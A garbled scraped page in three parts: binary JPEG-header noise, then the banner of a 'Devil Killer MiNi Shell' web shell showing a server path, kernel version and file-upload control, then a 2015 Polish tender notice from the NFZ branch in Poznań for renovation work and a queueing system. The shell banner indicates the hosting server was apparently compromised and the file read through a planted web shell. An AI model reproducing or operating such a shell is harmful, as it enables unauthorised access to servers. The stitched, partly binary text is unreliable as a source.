JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150107/1483-N-2015.html

<p class="kh_header"><b>Poznań: Roboty budowlane w zakresie modernizacji strefy obsługi interesantów oraz dostawa, instalacja i wdrożenie Systemu Kolejkowania Interesantów w budynku Wielkopolskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia przy ul. Grunwaldzkiej 158 w Poznaniu</b><br>
<b>Numer ogłoszenia: 1483 - 2015; data zamieszczenia: 07.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolski Oddział Wojewódzki Narodowego Funduszu Zdrowia w Poznaniu , ul. Grunwaldzka 158, 60-309 Poznań, woj. wielkopolskie, tel. 61 8506020, faks 61 8506131.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nfz-poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w zakresie modernizacji strefy obsługi interesantów oraz dostawa, instalacja i wdrożenie Systemu Kolejkowania Interesantów w budynku Wielkopolskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia przy ul. Grunwaldzkiej 158 w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1: ROBOTY BUDOWLANE W ZAKRESIE MODERNIZACJI STREFY OBSŁUGI INTERESANTÓW W BUDYNKU WIELKOPOLSKIEGO ODDZIAŁU WOJEWÓDZKIEGO NARODOWEGO FUNDUSZU ZDROWIA PRZY UL. GRUNWALDZKIEJ 158 W POZNANIU
1.	Wykonawca zobowiązuje się zrealizować przedmiot umowy na Roboty budowlane w zakresie modernizacji strefy obsługi interesantów w budynku Wielkopolskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia przy ul. Grunwaldzkiej 158 w Poznaniu (część 1) zgodnie z:
a.	projektem budowlanym, stanowiącym załącznik nr 1 do projektu umowy, zawierającym:
i.	wielobranżowy projekt adaptacji i modernizacji strefy obsługi interesantów w budynku Wielkopolskiego OW NFZ w Poznaniu,
ii.	szczegółową specyfikację techniczną wykonania i odbioru robót,
iii.	przedmiar robót,
b.	projektem aranżacji wnętrz, stanowiącym załącznik nr 2 do projektu umowy, zawierającym:
i.	projekt aranżacji wnętrz,
ii.	opis minimalnych wymagań techniczno-użytkowych wyposażenia strefy obsługi interesantów WOW NFZ,
iii.	przedmiar - ilościowe zestawienie wyposażenia z kolorystyką, kosztorys - cenowe zestawienie wyposażenia,
c.	dokumentacją instalacji sanitarnych, stanowiącą załącznik nr 3 do projektu umowy, zwierającą:
i.	specyfikację techniczną wykonania i odbioru robót,
ii.	przedmiar robót - instalacje sanitarne
d.	dokumentacją instalacji elektrycznych, stanowiącą załącznik nr 4 do projektu umowy, zawierającą:
i.	specyfikację techniczną wykonania i odbioru robót
ii.	kosztorys ślepy
e.	dokumentacją systemu kontroli dostępu, stanowiącą załącznik nr 5 do projektu umowy, zwierającą:
i.	opis instalacji oraz specyfikacje techniczną,
ii.	przedmiar systemu kontroli dostępu
f.	dokumentacją sieci okablowania strukturalnego, stanowiącą załącznik nr 6 do projektu umowy, zwierającą:
i.	projekt: adaptacja i modernizacja sieci okablowania strukturalnego z wydzielonym zasilaniem dedykowanym Strefy Obsługi Interesantów,
ii.	kosztorys ofertowy,
	oraz 
g.	wymaganiami wynikającymi z obowiązujących przepisów prawa oraz rzetelnej wiedzy technicznej, prawa budowlanego, wymagań bhp oraz przeciwpożarowych,
h.	wymaganiami wynikającymi z obowiązujących Polskich Norm i aprobat technicznych.
2.	W przypadku wykrycia w dokumentacji błędów lub rozwiązań sprzecznych z zasadami rzetelnej wiedzy technicznej, Wykonawca zobowiązany jest niezwłocznie poinformować Zamawiającego oraz inspektora nadzoru inwestorskiego o wykrytych nieprawidłowościach i zaproponować poprawne rozwiązanie. 

Szczegółową charakterystykę zamówienia oraz zakres praw i obowiązków związanych z ich realizacją zawiera wzór umowy wraz z załącznikami stanowiący Załącznik D do niniejszej Specyfikacji Istotnych Warunków Zamówienia. 

CZĘŚĆ 2: DOSTAWA, INSTALACJA I WDROŻENIE SYSTEMU KOLEJKOWANIA INTERESANTÓW
1.	Przedmiotem umowy jest dostawa, instalacja i wdrożenie Systemu Kolejkowania Interesantów, zamiennie nazywanego Systemem, zgodnie z projektem technicznym, stanowiącym Załącznik nr 2 do umowy. 
2.	Przedmiot umowy określony w ust. 1 należy dostarczyć, zainstalować i uruchomić w siedzibie WOW NFZ przy ul. Grunwaldzkiej 158 w Poznaniu.
3.	Załącznik nr 2 do umowy obejmuje: Opis instalacji, Specyfikację techniczną oraz Przedmiar Systemu.
4.	W przypadku zastosowania przez Wykonawcę elementów równoważnych (zamienników) w instalacji Systemu, wymagane jest uzyskanie akceptacji Zamawiającego na dokonanie takich zmian oraz wykonanie na koszt Wykonawcy projektu uwzględniającego proponowane zmiany. 
5.	Wykonawca może złożyć ofertę równoważną. Zamawiający jako ofertę równoważną rozumie ofertę, w której zamiast wyświetlaczy stanowiskowych w technologii LED zaproponowane zostanie zastosowanie telewizorów LCD.

Szczegółową charakterystykę zamówienia oraz zakres praw i obowiązków związanych z ich realizacją zawiera wzór umowy wraz z załącznikami stanowiący Załącznik E do niniejszej Specyfikacji Istotnych Warunków Zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.31.11.00-1, 32.32.24.60-6, 32.42.00.00-3, 42.99.12.30-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest pod rygorem wykluczenia z udziału w postępowaniu wnieść wadium przed upływem terminu składania ofert.

Wadium dla części 1: Roboty budowlane w zakresie modernizacji strefy obsługi interesantów w budynku Wielkopolskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia przy ul. Grunwaldzkiej 158 w Poznaniu musi być wniesione w wysokości 15.000 zł. słownie: piętnaście tysięcy złotych.

Wadium dla części 2: Dostawa, instalacja i wdrożenie Systemu Kolejkowania Interesantów musi być wniesione w wysokości 1.500 zł słownie: jeden tysiąc pięćset złotych.

Wadium można wnieść w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy w:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 Nr 42, poz. 275). 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego.
Jako termin wniesienia wadium w formie pieniężnej uznaje się termin wpływu przelewu na konto Zamawiającego.
Wadium zostanie zwrócone zgodnie z przepisami art. 46 ust 1, 1a albo 2 ustawy.
Wadium zostanie zatrzymane wraz z odsetkami jeżeli zaistnieją okoliczności przewidziane w art. 46 ust. 4a lub ust. 5 ustawy. 
Zgodnie z art. 46 ust. 4a, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń o których mowa w ar. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
Zgodnie z art. 46 ust. 5 ustawy, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
Dowodem wniesienia wadium będzie:
1)	pokwitowanie przelewu kwoty pieniężnej na dobro rachunku Zamawiającego na rachunek bankowy 78 1130 1088 0001 3007 0720 0011, potwierdzone faktycznym wpływem środków na rachunek przed upływem terminu wnoszenia wadium,
2)	dokument potwierdzający zobowiązanie do pokrycia wadium (wadium w formie niepieniężnej).
Wadium wnoszone w innej formie niż w pieniądzu, powinno zawierać bezwzględne 
i nieodwołalne zobowiązanie podmiotu udzielającego do wypłaty kwoty wadium w przypadkach wymienionych w art. 46 ust. 4a i 5 ustawy.
Wykonawca zobowiązany jest załączyć do oferty potwierdzenie wniesienia wymaganego wadium przetargowego (kopię przelewu kwoty pieniężnej na dobro rachunku Zamawiającego na konto bankowe) lub załączyć do oferty dokument (oryginał) potwierdzający zobowiązanie do pokrycia wadium (wadium w formie niepieniężnej). Oryginał dokumentu potwierdzający wniesienie wadium w innej formie niż pieniądz należy złożyć wraz z ofertą w oddzielnej wewnętrznej kopercie oznaczonej WADIUM.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy. Do formularza ofertowego (dotyczy każdej części zamówienia) należy dołączyć kosztorys ofertowy przygotowany na formularzach tożsamych z przedmiarami robót/kosztorysami ślepymi.
Upoważnienie do występowania w imieniu Wykonawcy. Jeżeli w czynnościach dotyczących postępowania Wykonawcę zastępuje inna osoba, upoważnienie takie winno być załączone do oferty, nie później niż z upływem terminu składania ofert.
Potwierdzenie złożenia wadium
Wykonawca zobowiązany jest załączyć do oferty potwierdzenie wniesienia wymaganego wadium przetargowego (kopię przelewu kwoty pieniężnej na dobro rachunku Zamawiającego na konto bankowe) lub załączyć do oferty dokument (oryginał) potwierdzający zobowiązanie do pokrycia wadium (wadium w formie niepieniężnej) - odrębnie dla każdej części. Oryginał dokumentu potwierdzający wniesienie wadium w innej formie niż pieniądz należy złożyć wraz z ofertą w oddzielnej wewnętrznej kopercie oznaczonej WADIUM.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>(Część 1)	 W przypadku wykrycia w dokumentacji błędów lub rozwiązań sprzecznych z zasadami rzetelnej wiedzy technicznej  Wykonawca zobowiązany jest niezwłocznie poinformować Zamawiającego oraz inspektora nadzoru inwestorskiego o wykrytych nieprawidłowościach i zaproponować poprawne rozwiązanie. 
Zamawiający dopuszcza możliwość wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową oraz innymi określonymi wymaganiami w sytuacji, gdy dokonanie zamian będzie uzasadnione i zgodne z zasadami wiedzy technicznej, i nie będzie wnosić dodatkowych obciążeń finansowych dla Zamawiającego.
W przypadku wystąpienia potrzeby wykonania robót dodatkowych, nie przewidzianych w zamówieniu podstawowym, lecz ściśle związanych z wykonywanymi robotami podstawowymi 
i mającymi wpływ na poprawność ich wykonania, dopuszcza się wykonanie robót dodatkowych wg cen określonych w zamówieniu podstawowym lub rynkowych, jednak w zakresie nie większym niż 50% wartości zamówienia podstawowego.
Dopuszcza się również możliwość ograniczenia zakresu rzeczowego przedmiotu umowy, w sytuacji, gdy wykonanie danych robót okaże się zbędne lub wynikać będzie z błędów w dokumentacji - wg cen określonych w kosztorysie ofertowym.


Część 2
Wykonawca może zastosować elementy równoważne, określone w ofercie. 
W przypadku zastosowania przez Wykonawcę zamienników w instalacji Systemu w stosunku do projektu i złożonej oferty, wymagane jest uzyskanie akceptacji Zamawiającego na dokonanie takich zmian oraz wykonanie na koszt Wykonawcy projektu powykonawczego uwzględniającego proponowane zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nfz-poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielkopolski Oddział Wojewódzki Narodowego Funduszu Zdrowia
60-309 Poznań, ul. Grunwaldzka 158, I p. pok. 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2015 godzina 09:30, miejsce: Wielkopolski Oddział Wojewódzki Narodowego Funduszu Zdrowia
60-309 Poznań, ul. Grunwaldzka 158, I p. pok. 113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji zamówienia wynosi:
dla części 1: Roboty budowlane w zakresie modernizacji strefy obsługi interesantów 
w budynku Wielkopolskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia przy ul. Grunwaldzkiej 158 w Poznaniu) - 90 dni od daty rozpoczęcia robót budowlanych, 
z uwzględnieniem terminu wykonania określonego w ofercie (skrócenie terminu realizacji zamówienia jest jednym z kryteriów oceny ofert).
dla części 2: Dostawa, instalacja i wdrożenie Systemu Kolejkowania Interesantów - 90 dni dnia podpisania umowy.
Oświadczenie dotyczące  zabezpieczenia należytego wykonania umowy
Wykonawca jest obowiązany przed podpisaniem umowy na realizację zamówienia wnieść zabezpieczenie należytego wykonania umowy o wartości 10% ceny brutto wybranej oferty (dotyczy zarówno części 1: Roboty budowlane w zakresie modernizacji strefy obsługi interesantów, jak i części 2: Dostawa, instalacja i wdrożenie Systemu Kolejkowania Interesantów).
Wykonawca może złożyć ofertę na wybraną część zamówienia lub oferty na obie części zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlane w zakresie modernizacji strefy obsługi interesantów w budynku Wielkopolskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia przy ul. Grunwaldzkiej 158 w Poznaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wykonawca zobowiązuje się zrealizować przedmiot umowy na Roboty budowlane w zakresie modernizacji strefy obsługi interesantów w budynku Wielkopolskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia przy ul. Grunwaldzkiej 158 w Poznaniu (część 1) zgodnie z:
a.	projektem budowlanym, stanowiącym załącznik nr 1 do projektu umowy, zawierającym:
i.	wielobranżowy projekt adaptacji i modernizacji strefy obsługi interesantów w budynku Wielkopolskiego OW NFZ w Poznaniu,
ii.	szczegółową specyfikację techniczną wykonania i odbioru robót,
iii.	przedmiar robót,
b.	projektem aranżacji wnętrz, stanowiącym załącznik nr 2 do projektu umowy, zawierającym:
i.	projekt aranżacji wnętrz,
ii.	opis minimalnych wymagań techniczno-użytkowych wyposażenia strefy obsługi interesantów WOW NFZ,
iii.	przedmiar - ilościowe zestawienie wyposażenia z kolorystyką, kosztorys - cenowe zestawienie wyposażenia,
c.	dokumentacją instalacji sanitarnych, stanowiącą załącznik nr 3 do projektu umowy, zwierającą:
i.	specyfikację techniczną wykonania i odbioru robót,
ii.	przedmiar robót - instalacje sanitarne
d.	dokumentacją instalacji elektrycznych, stanowiącą załącznik nr 4 do projektu umowy, zawierającą:
i.	specyfikację techniczną wykonania i odbioru robót
ii.	kosztorys ślepy
e.	dokumentacją systemu kontroli dostępu, stanowiącą załącznik nr 5 do projektu umowy, zwierającą:
i.	opis instalacji oraz specyfikacje techniczną,
ii.	przedmiar systemu kontroli dostępu
